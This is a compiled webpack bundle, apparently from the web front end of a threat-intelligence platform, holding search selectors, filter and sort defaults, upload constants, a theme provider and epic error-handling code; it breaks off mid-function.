var entityPageQueryRaw = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'entityPageQueryRaw']);
var entitiesLoadingAllData = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'entitiesLoadingAllData']);

/* Reports without irrelevant tags */
var entityPageQuery = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([entityPageQueryRaw, __WEBPACK_IMPORTED_MODULE_7__tags_getters__["allTagOptionsReports"]], function (entityQueryObject, allReportTags) {
  var reportTagsInSearchPayload = entityQueryObject.get('tagFilters');
  var onlyEntityTags = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    included: reportTagsInSearchPayload.get('included').subtract(allReportTags.included),
    excluded: reportTagsInSearchPayload.get('excluded').subtract(allReportTags.excluded)
  });
  return entityQueryObject.set('tagFilters', onlyEntityTags);
});

/* Merge entities search results with metadata */
var entityResultsWithMeta = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([queryResults, __WEBPACK_IMPORTED_MODULE_6_modules_indicators_getters__["metadata"], __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters__["enclavesMap"]], function (queryResults, metadata, enclaves) {
  return queryResults.get('entities').update('items', function (entity) {
    return entity.map(function (r) {
      var meta = metadata.get(r.get('guid'), Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])());
      // We want to use non-meta dates for first and last seen because that's how our sort works
      meta = meta.set('lastSeen', r.get('lastSeen'));

      return r.merge(meta) // Merge metadata with data, but give data precedence
      .set('enclaves', r.get('enclaveGuids').map(function (enclave) {
        return enclaves.get(enclave);
      })).update('enclaves', function (enclaves) {
        return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Set"])(enclaves);
      });
    });
  });
});

// Search page will have its own query object, but the actions it provides will map out to reports and iocs
var searchPageQuery = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'reportPageQueryRaw']);
var searchPayloadHasBeenInitialized = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['search', 'searchPayloadHasBeenInitialized']);

var allSearchResultsWithMeta = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([reportResultsWithMeta, entityResultsWithMeta], function (reportResults, entityResults) {
  var reportsTotal = reportResults.get('totalElements', 0);
  var entitiesTotal = entityResults.get('totalElements', 0);

  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    reportResults: reportResults,
    entityResults: entityResults,
    reportsTotal: reportsTotal,
    entitiesTotal: entitiesTotal,
    totalResults: reportsTotal + entitiesTotal
  });
});

var defaultFilters = {
  number: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    type: 'NUMBER',
    text: 'Greater Than',
    operator: 'gt',
    firstValue: 0
  }),
  boolean: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    type: 'BOOLEAN',
    text: 'Select Caption',
    firstValue: false
  }),
  date: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    type: 'DATE',
    text: 'Date',
    operator: 'RANGE',
    firstValue: __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_utils_Date_constants__["a" /* default */].LAST_MONTH,
    secondValue: __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_utils_Date_constants__["a" /* default */].NOW
  }),
  tag: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    included: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Set"])(),
    excluded: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Set"])()
  }),
  term: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    type: 'TERMS',
    values: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Set"])()
  })
};

var defaultSorterValues = {
  searchSorterPlaceholder: 'Select',
  searchSorterSearchReports: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    text: 'Newest to Oldest Updated',
    sort: {
      sortBy: 'updated',
      sortDirection: 'DESC' // ASC / DESC
    }
  }),
  searchSorterSearchEntities: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    text: 'Most Recent Last Seen',
    sort: {
      sortBy: 'lastSeen',
      sortDirection: 'DESC'
    }
  })
};

var entityTypeOptions = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Set"])(['DOMAIN', 'URL', 'SOFTWARE', 'MALWARE', 'CVE', 'SHA256', 'SHA1', 'MD5', 'EMAIL_ADDRESS', 'REGISTRY_KEY', 'IP', 'BITCOIN_ADDRESS', 'CIDR_BLOCK', 'PHONE_NUMBER', 'X_ID', 'THREAT_ACTOR']);

var reportSortOptions = [{
  text: 'Newest to Oldest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'DESC'
  }
}, {
  text: 'Oldest to Newest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'ASC'
  }
}, {
  text: 'Newest to Oldest Submitted',
  sort: {
    sortBy: 'created',
    sortDirection: 'DESC'
  }
}, {
  text: 'Oldest to Newest Submitted',
  sort: {
    sortBy: 'created',
    sortDirection: 'ASC'
  }
}];

var entitySortOptions = [{
  text: 'Most Recent Last Seen',
  sort: {
    sortBy: 'lastSeen',
    sortDirection: 'DESC'
  }
}, {
  text: 'Least Recent Last Seen',
  sort: {
    sortBy: 'lastSeen',
    sortDirection: 'ASC'
  }
}, {
  text: 'Most Recent First Seen',
  sort: {
    sortBy: 'firstSeen',
    sortDirection: 'DESC'
  }
}, {
  text: 'Least Recent First Seen',
  sort: {
    sortBy: 'firstSeen',
    sortDirection: 'ASC'
  }
}];

var defaultReportsSearchPayload = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
  query: '',
  filters: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["OrderedMap"])({}),
  sort: defaultSorterValues.searchSorterSearchReports,
  enclaveFilters: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Set"])([]),
  tagFilters: defaultFilters.tag,
  pageNumber: 0,
  pageSize: 25
});

var defaultEntitiesSearchPayload = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
  query: '',
  filters: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["OrderedMap"])({}),
  sort: defaultSorterValues.searchSorterSearchEntities,
  enclaveFilters: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Set"])([]),
  tagFilters: defaultFilters.tag,
  pageNumber: 0,
  pageSize: 25
});

var defaultReportResult = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
  empty: true,
  items: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])() // PAGE SIZE and stuff? TODO
});

var defaultEntityResult = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
  empty: true,
  items: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])() // PAGE SIZE and stuff? TODO
});

var defaultSearchResults = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
  reports: defaultReportResult,
  entities: defaultEntityResult
});

/***/ }),
/* 558 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(409);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(215);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2960);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2961);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils__ = __webpack_require__(509);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "utils", function() { return __WEBPACK_IMPORTED_MODULE_4__utils__; });










/***/ }),
/* 559 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DESC; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ASC; });
/* unused harmony export STORED_USERNAME_KEY */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return TRUSTAR_API_HOST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return TRUSTAR_WORKFLOWS_LOCALHOST; });
/* unused harmony export ACCEPTED_REPORT_EXTENSIONS */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return MITRE_PREFIX; });


// For sorting
var DESC = 'DESC';
var ASC = 'ASC';

// For storing the uesrname in local storage
var STORED_USERNAME_KEY = 'ts_stored_username';

var TRUSTAR_API_HOST = undefined || '';
var TRUSTAR_WORKFLOWS_LOCALHOST = Object({"SERVICES_APTRINSIC_ENABLED":true,"SERVICES_NEW_RELIC_ENABLED":false,"SERVICES_SENTRY_ENABLED":true,"NODE_ENV":"production","ENV":"production","TRUSTAR_API_HOST":undefined,"TRUSTAR_STATION_HOST":undefined,"SPLIT_AUTHORIZATION_KEY":"7iki1574js01dvm0oq3kaaj3755bj02lgaeo","__VERSION__":"v5.2.3-23-gdec5e66"}).TRUSTAR_WORKFLOWS_LOCALHOST || '';

// File types accepted for attaching a report to a TS report
var ACCEPTED_REPORT_EXTENSIONS = ['.doc', '.docx', '.pdf', '.txt', '.rtf', '.stix', '.xml', '.html', '.json', '.csv'].join(',');

var MITRE_PREFIX = 'mitre/';

/***/ }),
/* 560 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(577);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(300);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(3198);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(3200);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 561 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return SUBMIT_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return UPLOAD_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return INDICATORS_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return INDICATORS_FILE_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return JAVA_DATE_FORMAT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return MAX_SUBJECT_LENGTH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return INITIAL_FORM_VALUES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return INITIAL_INDICATORS_FORM_VALUES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return SPREADSHEET; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FILE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return TEXT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return acceptedFilesTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return acceptedImageTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return acceptedSourceIconImageTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return maxFileSize; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return acceptedFilesTypesSpreadsheet; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_jstz__ = __webpack_require__(494);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_jstz___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_jstz__);



var SUBMIT_ENDPOINT = '/services/incident-reports';

var UPLOAD_ENDPOINT = '/services/extract';

var INDICATORS_ENDPOINT = '/services/create/submit-iocs';
var INDICATORS_FILE_ENDPOINT = INDICATORS_ENDPOINT + '-file';

// Java apparently has some non-standard, lame date parsing capabilities:
// https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html#ISO_ZONED_DATE_TIME
var JAVA_DATE_FORMAT = 'YYYY-MM-DDTHH:mm:ss.SSSZ';

// Max length in characters of the report subject
var MAX_SUBJECT_LENGTH = 300;

var currentTimezone = __WEBPACK_IMPORTED_MODULE_1_jstz___default.a.determine().name();

var INITIAL_FORM_VALUES = {
  title: '',
  distributionType: 'ENCLAVE',
  shouldEmailReportToThirdParty: false,
  enclaveGuid: null,
  timeBegan: null,
  timeBeganTimezone: currentTimezone,
  timeBeganUnknown: false,
  sector: null,
  tags: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  content: {
    name: '',
    size: null,
    type: null,
    data: ''
  }
};

var INITIAL_INDICATORS_FORM_VALUES = {
  enclaves: null,
  tags: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  content: {
    name: '',
    size: null,
    type: null,
    data: ''
  }
};

var SPREADSHEET = 'SPREADSHEET';
var FILE = 'FILE';
var TEXT = 'TEXT';

// Accepted file types for upload
var acceptedFilesTypes = ['text/*', '.csv', '.json', '.pdf', '.xml', '.stix', '.doc', '.docx', '.xls', '.xlsx', '.eml', '.msg'].join(',');

// Accepted file types for upload
var acceptedImageTypes = ['.jpg', '.png', '.jpeg'].join(',');

// Accepted icon image types for upload - SVG
var acceptedSourceIconImageTypes = ['.svg'].join(',');

// Max image file size in bytes (set to 2 MB)
var maxFileSize = Math.pow(2, 20);

var acceptedFilesTypesSpreadsheet = ['.csv', '.xls', '.xlsx'].join(',');

/***/ }),
/* 562 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(281);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actionTypes", function() { return __WEBPACK_IMPORTED_MODULE_0__action_types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__actions_js__ = __webpack_require__(3193);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_1__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__defaults_js__ = __webpack_require__(1412);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "defaults", function() { return __WEBPACK_IMPORTED_MODULE_2__defaults_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__getters_js__ = __webpack_require__(758);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_3__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__stores_js__ = __webpack_require__(3194);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_4__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__epics_js__ = __webpack_require__(3195);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_5__epics_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__types_js__ = __webpack_require__(759);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "types", function() { return __WEBPACK_IMPORTED_MODULE_6__types_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__utils_js__ = __webpack_require__(760);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "utils", function() { return __WEBPACK_IMPORTED_MODULE_7__utils_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__constants_js__ = __webpack_require__(1413);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "constants", function() { return __WEBPACK_IMPORTED_MODULE_8__constants_js__; });



















/***/ }),
/* 563 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_themes__ = __webpack_require__(77);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_modules_app_getters__ = __webpack_require__(182);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__web_modules_trustar_2_0_themes_common_globalSnippets_styles__ = __webpack_require__(891);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_features__ = __webpack_require__(181);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };











var initialValues = {
  theme: 'default',
  noBootstrap: false
};

var StyledSplunkContainer = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'ConnectedDesignProvider__StyledSplunkContainer',
  componentId: 'apzjg8-0'
})(['', ''], __WEBPACK_IMPORTED_MODULE_5__web_modules_trustar_2_0_themes_common_globalSnippets_styles__["a" /* PrismaGlobals */]);

var ConnectedDesignSystemProvider = function ConnectedDesignSystemProvider(props) {
  var className = props.theme === 'dark' ? 'trustar-dark' : 'trustar'; // revert to trustar-dark dark theme later


  // Temporary Feature Flag as we roll out splunk theme
  var DarkTheme = props.useSplunkTheme ? __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_themes__["a" /* DarkTheme */] : __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_themes__["c" /* LegacyDarkTheme */];
  var DefaultTheme = props.useSplunkTheme ? __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_themes__["b" /* DefaultTheme */] : __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_themes__["d" /* LegacyDefaultTheme */];

  var themeConfiguration = props.theme === 'dark' ? DarkTheme : DefaultTheme; // revert to dark theme later

  return props.noBootstrap ? __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_1_styled_components__["a" /* ThemeProvider */],
    { theme: themeConfiguration },
    props.children
  ) : __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'div',
    { className: props.noBootstrap ? null : className },
    props.children
  );
};

ConnectedDesignSystemProvider.defaultProps = initialValues;

var mapState = function mapState(state) {
  return {
    theme: Object(__WEBPACK_IMPORTED_MODULE_3_modules_app_getters__["theme"])(state),
    useSplunkTheme: __WEBPACK_IMPORTED_MODULE_6_modules_features__["d" /* getters */].isFeatureEnabled(__WEBPACK_IMPORTED_MODULE_6_modules_features__["c" /* flags */].SPLUNK_THEMES_ENABLED)(state)
  };
};
var mapDispatch = {};

var mergeProps = function mergeProps(stateProps, dispatchProps, ownProps) {
  return _extends({}, ownProps, dispatchProps, stateProps);
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_4_react_redux__["connect"])(mapState, mapDispatch, mergeProps)(ConnectedDesignSystemProvider));

/***/ }),
/* 564 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(2927);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(2928);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2933);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2934);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 565 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(3435);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(1472);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__epics_js__ = __webpack_require__(3436);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_2__epics_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__stores_js__ = __webpack_require__(3439);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "stores", function() { return __WEBPACK_IMPORTED_MODULE_3__stores_js__; });







// NOTE: This does not fit the pattern of the rest of our modules
// TODO: Refactor



/***/ }),
/* 566 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(3248);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(1302);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(3249);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(3251);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 567 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1432);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(777);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(1433);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(3252);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 568 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return createRootEpic; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return createAjax; });
/* unused harmony export LoggerConfig */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__constants__ = __webpack_require__(559);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__src_app_modules_app_constants__ = __webpack_require__(172);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _toConsumableArray(arr) { if (Array.isArray(arr)) { for (var i = 0, arr2 = Array(arr.length); i < arr.length; i++) { arr2[i] = arr[i]; } return arr2; } else { return Array.from(arr); } }








/*
 * Handler for errors thrown from individual module epics.
 */
var handleError = function handleError(error, name) {
  var message = 'Uncaught error in epic: ' + name;
  if (true) {
    console.warn(message);
    console.error(error);
    // TODO_LOG Raven.captureException(
    // TODO_LOG   error,
    // TODO_LOG   { extra: { name } }
    // TODO_LOG );
  } else {
    console.warn(message);
    console.error(error);
  }
};

/*
 * Error wrapper for individual module epics. This handles uncaught errors
 * and returns the original stream, so the error does not terminate the epic.
 */
var safelyWrapEpic = function safelyWrapEpic(_ref) {
  var epic = _ref.epic,
      name = _ref.name;
  return function () {
    return epic.apply(undefined, arguments).catch(function (error, source) {
      handleError(error, name);
      return source;
    });
  };
};

/*
 * Creates the root epic, given an array of epics, wrapping
 * each of the provided epics in a safe error catching wrapper.
 *
 * The purpose for this is that an uncaught error from an epic
 * will bubble up to the main epic and cause the entire stream
 * to terminate. This would render the app unusable, so we wrap
 * each individual epic in an error handler to prevent this from
 * happening. The wrapper handles the error and returns the original
 * stream, which revives the epic.
 *
 */
var createRootEpic = function createRootEpic(epics) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["pipe"])(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["map"])(safelyWrapEpic), function (epics) {
    return __WEBPACK_IMPORTED_MODULE_2_redux_observable__["combineEpics"].apply(undefined, _toConsumableArray(epics));
  })(epics);
};

/**
 * Traditionally, if any of these statuses were returned from the server we
 * would log the user out.
 */
var logoutStatuses = new Set([401, 403, 502]);

var onRequestFailure = function onRequestFailure(error) {
  var status = error.status;


  if (logoutStatuses.has(status)) {
    console.warn('[ LOGOUT WARNING ]: Got ' + status + ' from server.');

    // Suspicion
    var userLoggedIn = !!Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getCsrfToken"])() && window.localStorage.getItem(__WEBPACK_IMPORTED_MODULE_5__src_app_modules_app_constants__["IS_LOGGED_IN_LOCALSTORAGE_KEY"]) !== null;

    // Boot to login
    if (!userLoggedIn) {
      window.location.replace(__WEBPACK_IMPORTED_MODULE_5__src_app_modules_app_constants__["LOGIN_ENDPOINT_AUTHPATH"]);
    }
  }
};

var createAjax = function createAjax() {

  var ajax = function ajax(_ref2) {
    var _ref2$headers = _ref2.headers,
        headers = _ref2$headers === undefined ? {} : _ref2$headers,
